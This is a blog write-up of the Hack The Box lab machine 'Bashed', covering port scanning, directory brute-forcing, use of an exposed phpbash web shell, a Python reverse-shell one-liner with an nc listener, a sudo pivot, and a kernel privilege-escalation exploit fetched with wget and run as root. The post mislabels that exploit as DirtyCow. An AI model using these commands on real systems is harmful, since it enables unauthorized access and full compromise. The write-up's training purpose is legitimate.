HTB: Bashed

7 min readAug 21, 2022


Personally, I think Bashed is one of the easiest machines. All that needs to be done is generate a reverse shell.

So, let’s begin.


The first thing to do is to run an nmap scan to determine all the ports that are open.

└─$ sudo nmap -p- -sS -T4 -oG open_ports
Starting Nmap 7.92 ( ) at 2022-08-20 17:23 EDT
Nmap scan report for
Host is up (0.23s latency).
Not shown: 65534 closed tcp ports (reset)
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 800.17 seconds

It can be seen that only port 80 is open. So, we can check the page visually.

This appears to be a simple web page and if we click on the link of the top article it takes us to another page where link for a GitHub repo is provided. Also, by looking at the images attached in that article it looks like with this tool you can run commands on the machine on which it is hosted.

Gaining Foothold

So, the first thing that should come to one’s mind would be leverage this to create a reverse shell.

The next task is to find the page from where we can access this tool. From the GitHub repo and screenshots in the article it looks like it should be present at /uploads/phpbash.php or /uploads/phpbash.min.php but both these return a 404 Not Found error. It is possible that these webpages are hosted with some other name or in some other directory here, so we can run a directory brute-force attack to find out any hidden directories.

└─$ ffuf -u -w /usr/share/seclists/Discovery/Web-Content/common.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
:: Method : GET
:: URL :
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
.htpasswd [Status: 403, Size: 295, Words: 22, Lines: 12]
.hta [Status: 403, Size: 290, Words: 22, Lines: 12]
.htaccess [Status: 403, Size: 295, Words: 22, Lines: 12]
css [Status: 301, Size: 308, Words: 20, Lines: 10]
dev [Status: 301, Size: 308, Words: 20, Lines: 10]
fonts [Status: 301, Size: 310, Words: 20, Lines: 10]
images [Status: 301, Size: 311, Words: 20, Lines: 10]
index.html [Status: 200, Size: 7743, Words: 2956, Lines: 162]
js [Status: 301, Size: 307, Words: 20, Lines: 10]
php [Status: 301, Size: 308, Words: 20, Lines: 10]
server-status [Status: 403, Size: 299, Words: 22, Lines: 12]
uploads [Status: 301, Size: 312, Words: 20, Lines: 10]
:: Progress: [4713/4713] :: Job [1/1] :: 386 req/sec :: Duration: [0:00:15] :: Errors: 0

While checking each path manually, we can see that the same php file are present in the /dev directory.

So, now we have access to a shell and all we need to do is generate a reverse connection on our local system.

We can create a reverse connection using python but we need to check if python is present on the target machine or not.

And it looks like python is present on the target machine. So, we can start a listener using the command nc -nlvp 1337 and then run the python command mentioned below in the shell to get a reverse connection.

export RHOST="";export RPORT=1337;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

Right after running this command we get our reverse shell as shown below

└─$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [] from (UNKNOWN) [] 52814
$ whoami
$ pwd

We can now read the user flag present at /home/arrexel/user.txt.

Privilege Escalation

Now that we have access as www-data our next target is to get root of this machine. The first thing that we can check would be the commands that we can run as root or other users.

$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass,
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

It looks like we can run all the commands as user scriptmanager. So, we can use GTFOBins with Python to get a shell as scriptmanager.

$ sudo -u scriptmanager python -c 'import os; os.execl("/bin/bash", "bash", "-p")'
sudo -u scriptmanager python -c 'import os; os.execl("/bin/bash", "bash", "-p")'
scriptmanager@bashed:/home/arrexel$ whoami

The next task is to further escalate our privileges and become root. So, we can again try to check the output of sudo -l for scriptmanager but it won't work this time as it asks for password which we don't know. A few other things that we can check for would be cronjobs and files that have their SUID bit set.

$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
$ find / -perm /2000 2> /dev/null
find / -perm /2000 2> /dev/null

But we can’t find anything interesting over here as well. We can also try to check the Linux version and see if there are any exploits available for the same.

$ uname -a
uname -a
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/lsb-release
cat /etc/lsb-release

From a quick google search we can figure out that this version is vulnerable to an attack called as DirtyCow and codes to perform this exploit are readily available. But all the exploits are in C so we need to check if gcc is present on the target machine or not else we need to compile the executable on our machine and then send it over to target.

scriptmanager@bashed:/home/arrexel$ which gcc
which gcc

So, it looks like gcc is not present on the target machine so we can compile it on our own machine and then send it.

The exploit that I found was this one and all we had to do was get this code, compile it and run it on the target machine.

└─$ searchsploit -m 41458
Exploit: Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation
Path: /usr/share/exploitdb/exploits/linux/local/41458.c
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/htb/bashed/4145

└─$ gcc 41458.c -o exploit

We can send this to that target machine by creating a python server with the command python3 -m http.server and then retrieving the file on the target machine with wget.

We also need to make this file executable which can be done by chmod +x exploit. Once that is done all we need to do is run the executable and get a shell as root.

scriptmanager@bashed:~$ ./exploit
[.] namespace sandbox setup successfully
[.] disabling SMEP & SMAP
[.] scheduling 0xffffffff81064550(0x406e0)
[.] waiting for the timer to execute
[.] done
[.] SMEP & SMAP should be off now
[.] getting root
[.] executing 0x556b57a39356
[.] done
[.] should be root now
[.] checking if we got root
[+] got r00t ^_^
[!] don't kill the exploit binary, the kernel will crash
root@bashed:/home/scriptmanager# whoami

Now that we have access as root, we can easily read the root flag!

Some Key Points to Take Away

  1. Always check for OS version specific exploits.


  1. Bashed
  2. DirtyCow Exploit
  3. GFOBins

Do check out my other work and write-ups at




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